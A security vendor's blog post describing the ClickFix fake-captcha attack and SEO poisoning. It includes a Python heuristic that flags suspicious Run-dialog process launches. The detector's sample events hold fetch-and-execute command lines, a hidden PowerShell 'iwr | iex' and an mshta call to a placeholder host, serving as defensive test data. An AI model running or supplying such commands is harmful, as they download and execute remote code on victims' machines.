
Threat Actors’ New “Fix,” So Easy It’s Addictive

A Look at the ClickFix Attack and SEO Poisoning

Attackers have many tools available to them. Over the years we have seen malicious PDFs, Business-Email-Chain phishing, Browser-in-Browser attacks and many more, each showing some level of sophistication in bypassing the defenses that we in IT and IT security put in place. Then comes the latest attack sweeping the internet: the ClickFix attack.

This attack preys on the ever-changing nature of the security landscape. Between two-factor authentication, SSO, passkeys and captchas, there is no end to the ways we have asked users to verify their identity. So, what's one more? If you are asked to paste into a window that opens after pressing "Windows key + R", it must just be another step in the never-ending verification process proving that you are, in fact, human.

The simplicity of this attack would make you assume that it wouldn’t be very effective. But from what Scinary’s security operations team has seen, this is far from the truth. Let’s go through the actual ClickFix attack chain.

ClickFix Attack Chain

ClickFix tends to prey on end-users looking for free resources online. For our education folks, think of a teacher looking for a free worksheet for students. The end-user types "free science homework assignment" into Google and clicks the first result at the top. Sometimes those results are paid ads, and other times the attacker is leveraging SEO (search engine optimization) to get their malicious site and/or file in front of the victim. This form of propagation is called SEO poisoning.

The attacker crafts their website and files so that the search engine displays the malicious content at or near the top of the search results. Once the end user has clicked through to the malicious webpage, they are met with the normal-looking "Verify you are a human" captcha, just as often happens when first visiting a new site. They click the check mark to verify they are human. They are then shown a second window requiring them to prove it further, but unlike a normal captcha, ClickFix does not ask them to type out a phrase or identify all the images of a "crosswalk." Instead, it instructs the end user to press "Windows key + R," then "Ctrl + V," and finally "Enter."

What has just happened is that the unsuspecting end-user has run malicious code in the Windows Run dialog; that code was silently copied to their clipboard when they opened the malicious website. The pasted command typically downloads and executes malware. As mentioned previously, this attack is extremely simple, but simple within the cybersecurity world often does not mean ineffective. In the case of ClickFix, this is especially true.
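The chain above leaves a recognizable footprint in endpoint telemetry: a command launched from the Run dialog appears as a child of explorer.exe, invokes a script host or download-capable system binary, and usually carries a URL, a hidden-window or encoded invocation, or is far longer than anything a person would type. The following is an added example written for this post, not Scinary's detection logic or any vendor rule; the heuristic thresholds, the interpreter list and the Sysmon Event ID 1 style sample records are all assumptions, and example.invalid is a placeholder host rather than an indicator.

```python
import re

# Heuristic (an assumption, not a vendor rule): a ClickFix paste-and-run shows up as
# explorer.exe spawning a script host / download-capable binary with a URL, a hidden or
# encoded invocation, or a command far longer than a typed Run entry.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "certutil.exe", "curl.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)
EVASION_RE = re.compile(
    r"-w(?:indowstyle)?\s+hidden"                       # window hidden from the user
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"   # base64-encoded command
    r"|\biex\b|invoke-expression", re.I)                # run fetched text as code


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the reasons an event looks like ClickFix; an empty list means benign."""
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return []   # not launched from the desktop shell / Run dialog
    if basename(event.get("Image", "")) not in INTERPRETERS:
        return []   # ordinary GUI application launch
    cmd = event.get("CommandLine", "")
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("command line references a remote URL")
    if EVASION_RE.search(cmd):
        reasons.append("hidden window, encoded command or IEX")
    if len(cmd) > 150:
        reasons.append("command far longer than a typed Run entry")
    return reasons


def triage(events) -> list:
    """Return (index, reasons) for each event that trips the heuristic."""
    return [(i, r) for i, e in enumerate(events) if (r := classify(e))]


# Constructed sample events (Sysmon EID 1 fields); example.invalid is a placeholder host.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://example.invalid/verify.txt | iex"'},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": f'"{PS}"'},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.invalid/captcha.hta"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell -File C:\Scripts\inventory.ps1"},
]
```

Running `triage(SAMPLE_EVENTS)` flags only the first and third records; the plain PowerShell launch from the shell and the scheduled script under svchost.exe pass as benign.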

What are some things that you can do to prevent this attack?

If you are a Scinary XDR customer, we detect and stop these attacks no matter the time, before they get bad—often without even needing to involve the IT teams. If you are interested in seeing how Scinary can partner with you, feel free to contact us!